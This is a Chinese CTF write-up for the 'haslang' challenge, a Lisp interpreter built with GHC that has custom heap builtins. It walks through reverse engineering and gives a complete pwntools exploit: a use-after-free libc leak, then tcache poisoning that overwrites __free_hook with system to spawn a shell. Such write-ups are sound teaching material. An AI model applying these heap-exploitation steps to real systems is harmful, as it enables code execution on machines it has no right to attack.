Lisp解释器+Tcache attack

haslang

1	GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.6) stable release version 2.27

haslang: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=5935040ca40a99cafbb83e41a98a1828bc3abec1, stripped
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

64位，dynamically，Partial RELRO，NX

逆向分析

比赛时测试出来是 Lisp 的语法：

>>> (define (concat list) (apply append list))
(lambda ("list") ...)

>>> concat 
Getting an unbound variable: concat
>>> concat 
Getting an unbound variable: concat
>>> (define (concat list) (apply append list))
(lambda ("list") ...)
>>> concat
(lambda ("list") ...)
>>> (concat)
Expected 1 args; found values

1 2	>>> (equal?) Expected 2 args; found values

1	(define (flag "flag"))

在逆向分析时发现本程序有很多加密的数据，导致交叉应用 X 失效，用 IDA 跟踪调试程序时发现根本找不到程序处理 Lisp 代码的核心逻辑

另外在 04EBFA0 处找到了一个表：

.rodata:00000000004EBFA0 3E 3E 3E 20 00                asc_4EBFA0 db '>>> ',0                  ; DATA XREF: sub_40BA98+32↑o
.rodata:00000000004EBFA5 71 75 69 74 00                aQuit db 'quit',0
.rodata:00000000004EBFAA 61 72 67 73 00                aArgs db 'args',0
.rodata:00000000004EBFAF 6C 6F 61 64 00                aLoad db 'load',0
.rodata:00000000004EBFB4 4D 61 69 6E 00                aMain db 'Main',0
.rodata:00000000004EBFB9 6D 61 69 6E 00                aMain_0 db 'main',0
.rodata:00000000004EBFBE 55 6E 70 61 63 6B 65 72 00    aUnpacker db 'Unpacker',0
.rodata:00000000004EBFC7 27 41 6E 79 55 6E 70 61 63 6B+aAnyunpacker db 27h,'AnyUnpacker',0
.rodata:00000000004EBFD4 65 64 69 74 43 68 75 6E 6B 00 aEditchunk db 'editChunk',0
.rodata:00000000004EBFDE 73 68 6F 77 43 68 75 6E 6B 00 aShowchunk db 'showChunk',0
.rodata:00000000004EBFE8 66 72 65 65 00                aFree_0 db 'free',0
.rodata:00000000004EBFED 61 6C 6C 6F 63 00             aAlloc db 'alloc',0
.rodata:00000000004EBFF3 61 70 70 6C 79 00             aApply db 'apply',0

值得注意的字符串就是 editChunk 和 showChunk

Lisp 语法

LISP 是一种通用高级计算机程序语言，长期以来垄断人工智能领域的应用

LISP 作为应用人工智能而设计的语言，是第一个声明式系内函数式程序设计语言，有别于命令式系内过程式的 C，Fortran 和面向对象的 Java，Python 等结构化程序设计语言

LISP 只有两种数据结构：

原子 atom：原子为标识符形式的符号或数字的字面值
表 list：表则是由零个或多个表达式组成的序列（不需要使用一般表处理所必需的任意插入及删除操作）

LISP 的语法是简洁的典型，程序代码与数据的形式完全相同

以圆括号为边界的表：（A B C D）

数据：有 A，B，C，D 这4个元素的表
函数：将名为 A 的函数作用于 B，C 和 D 这3个参数

嵌套表结构亦是以圆括号来表示：（A（B C）D（E（F G）））

入侵思路

比赛时先用 IDA 搜索了一下字符串 “version”，想找一下有没有源码

void __fastcall __noreturn sub_4C5F20(char *format, __gnuc_va_list arg)
{
  if ( qword_52E940 && s )
    fprintf(stderr, "%s: internal error: ", s);
  else
    fwrite("internal error: ", 1uLL, 0x10uLL, stderr);
  vfprintf(stderr, format, arg);
  fputc(10, stderr);
  fprintf(stderr, "    (GHC version %s for %s)\n", "9.0.2", "x86_64_unknown_linux");
  fwrite("    Please report this as a GHC bug:  https://www.haskell.org/ghc/reportabug\n", 1uLL, 0x4DuLL, stderr);
  fflush(stderr);
  abort();
}

然后在如下网站中下载 9.0.2 版本的 GHC

GHC 9.0.2 download — The Glasgow Haskell Compiler

接下来先编译源码然后 bindiff 一下，看看有没有什么改动：

发现不管是对比源码还是恢复符号，最终的效果都不是很好，猜测作者对源代码进行了扩展，添加了一些自己实现的功能进去（例如 editChunk showChunk）

所以接下来的思路就是要尝试调用 editChunk 或者 showChunk，看看能不能对堆进行泄露或者修改，比赛时也是最终卡在了这里，因为 IDA 的交叉引用失效，我很难找出来报错的原因：

1 2	>>> (showChunk 1) haslang: src/Interpreter.hs:(127,1)-(130,25): Non-exhaustive patterns in function showChunk

>>> (define var 1)
1
>>> (showChunk var)
haslang: src/Interpreter.hs:(127,1)-(130,25): Non-exhaustive patterns in function showChunk

其实比赛时没有想到 showChunk editChunk 要传入一个指针
因为对 Lisp 不熟悉，当时根本没有想到 Lisp 还有指针类型

正确的语法如下：

(define ptr1 (alloc 64)) 
(free ptr1)
(showChunk ptr1)
(editChunk ptr1 0 1)

使用 patchelf 时有一个小细节需要注意：

1
2

➜  haslang patchelf ./haslang --set-interpreter ./ld-2.27.so  --replace-needed libc.so.6 ./libc-2.27.so --replace-needed libpthread.so.0 ./libpthread-2.27.so --output haslang1
➜  haslang patchelf --set-interpreter /home/yhellow/Tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/ld-2.27.so --set-rpath /home/yhellow/Tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64 haslang1

单独使用这两条命令中的一条，程序都运行不起来
同时使用这两条命令，程序就可以跑起来了

测试案例如下：

def add(who, size):
    p.sendlineafter('>>> ','(define ' + str(who) + ' (alloc ' + str(size) + '))')

def free(who):
    p.sendlineafter('>>> ','(free ' + str(who) + ')')

def edit(who, idx, what):
    p.sendlineafter('>>> ','(editChunk ' + str(who) + ' ' + str(idx) + ' ' + str(what) + ')')

def show(who):
    p.sendlineafter('>>> ','(showChunk ' + str(who) + ')')

def exp(p):
	add('ptr1', 0x500)
	add('ptr2', 0x20)
	"""
	pwndbg> distance 0xb19eb0 0x9f1000
	0xb19eb0->0x9f1000 is -0x128eb0 bytes (-0x251d6 words)
	edit('ptr1',0,0x73)#s
	edit('ptr1',1,0x73)#s
	edit('ptr1',2,0x73)#s
	edit('ptr1',3,0x73)#s
	edit('ptr1',4,0x73)#s
	edit('ptr1',5,0x73)#s
	edit('ptr1',6,0x73)#s
	edit('ptr1',7,0x73)#s
    """
	free('ptr1')
	edit('ptr1',0,0x73)#s
	show('ptr1')
	leak_addr = u64(p.recvuntil(b'\x7f',timeout=1).ljust(8,b'\x00'))
	libc_base =  leak_addr - 0x3ebc73
	success("leak_addr >> " + hex(leak_addr))
	success("libc_base >> " + hex(libc_base))
	"""
	pwndbg> telescope 0x15a2000+0x128eb0
	00:0000│  0x16caeb0 —▸ 0x7fe0561faca0 —▸ 0x16cb3e0 ◂— 0x0
	01:0008│  0x16caeb8 —▸ 0x7fe0561faca0 —▸ 0x16cb3e0 ◂— 0x0
	"""
	p.interactive()

其实思路就是通过 free unsortedbin 和 showChunk 来泄露 libc_base
先用 editChunk 写入一些数据，然后直接 search 并计算偏移
然后新开一个 GDB 来进行泄露：
- 由于 showChunk 不能泄露不可见字符，因此需要进行爆破
- 需要用 editChunk 来填充最后一字节不可见字符（PIE 最后3位固定）

然后的思路就很简单了，通过 editChunk 修改 tcache chunk->FD 接修改 free_hook 即可

完整 exp 如下：

# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './haslang1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.27.so')

rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s            : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'x00'))
uu64 = lambda data        : u64(data.ljust(8, b'x00'))

"""
local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')
"""

def debug():
    gdb.attach(p)
    #gdb.attach(p,"b *$rebase(0x269F)\n")
    #pause()

def add(who, size):
    p.sendlineafter('>>> ','(define ' + str(who) + ' (alloc ' + str(size) + '))')

def free(who):
    p.sendlineafter('>>> ','(free ' + str(who) + ')')

def edit(who, idx, what):
    p.sendlineafter('>>> ','(editChunk ' + str(who) + ' ' + str(idx) + ' ' + str(what) + ')')

def show(who):
    p.sendlineafter('>>> ','(showChunk ' + str(who) + ')')

def exp(p):
	add('ptr1', 0x500)
	add('ptr2', 0x20)
	"""
	pwndbg> distance 0xb19eb0 0x9f1000
	0xb19eb0->0x9f1000 is -0x128eb0 bytes (-0x251d6 words)
	edit('ptr1',0,0x73)#s
	edit('ptr1',1,0x73)#s
	edit('ptr1',2,0x73)#s
	edit('ptr1',3,0x73)#s
	edit('ptr1',4,0x73)#s
	edit('ptr1',5,0x73)#s
	edit('ptr1',6,0x73)#s
	edit('ptr1',7,0x73)#s
    """
	free('ptr1')
	edit('ptr1',0,0x73)#s
	show('ptr1')
	leak_addr = u64(p.recvuntil(b'\x7f',timeout=1).ljust(8,b'\x00'))
	if leak_addr < 0x7f0000000000:
		p.close()
		return
	libc_base =  leak_addr - 0x3ebc73
	success("leak_addr >> " + hex(leak_addr))
	success("libc_base >> " + hex(libc_base))
	"""
	pwndbg> telescope 0x15a2000+0x128eb0
	00:0000│  0x16caeb0 —▸ 0x7fe0561faca0 —▸ 0x16cb3e0 ◂— 0x0
	01:0008│  0x16caeb8 —▸ 0x7fe0561faca0 —▸ 0x16cb3e0 ◂— 0x0
	"""
	#debug()
	free_hook = libc_base + libc.sym["__free_hook"]
	system_libc = libc_base + libc.sym["system"]
	success("free_hook >> " + hex(free_hook))     
	success("system_libc >> " + hex(system_libc))
        
	add('ptr3', 0x20)
	add('ptr4', 0x20)
	add('ptr5', 0x20)

	free('ptr3')
	free('ptr4')

	for i in range(6):
		edit('ptr4',i,(free_hook >> (i*8)) % 0x100)

	add('ptr6', 0x20)
	add('ptr7', 0x20)
	for i in range(6):
		edit('ptr7',i,(system_libc >> (i*8)) % 0x100)

	edit('ptr6',0,ord("/"))
	edit('ptr6',1,ord("b"))
	edit('ptr6',2,ord("i"))
	edit('ptr6',3,ord("n"))
	edit('ptr6',4,ord("/"))
	edit('ptr6',5,ord("s"))
	edit('ptr6',6,ord("h"))

	#pause()
	free('ptr6')
	p.interactive()
        
while(True):
	p = process('./haslang1')
	exp(p)

小结：

本题目只要知道如何调用 alloc editChunk showChunk 就可以做出来，但可惜比赛时没有掌握 alloc 函数的用法

比赛是初见 Lisp 这种函数式编程的语言（其实 python 和 java 中的 Lambda 也是用了函数式编程的思想，以前没有太注意）

当我第一次遇见 Lisp 的语法时就感觉就很奇怪，首先是简洁无比的语法，然后是不能赋值的特点
这个不能赋值的特点在比赛时有些干扰我的思考（没法赋值就没法覆盖数据），导致我以为程序提供了某个类似于 open 的语法，于是我想直接 open flag 然后读出来，但我跟踪分析了几乎每一个 fopen 后发现行不通，浪费了不少时间
后来发现了 “editChunk showChunk” 这两个字符串，感觉像是作者自己实现的内置函数，于是才想着尝试去调用它们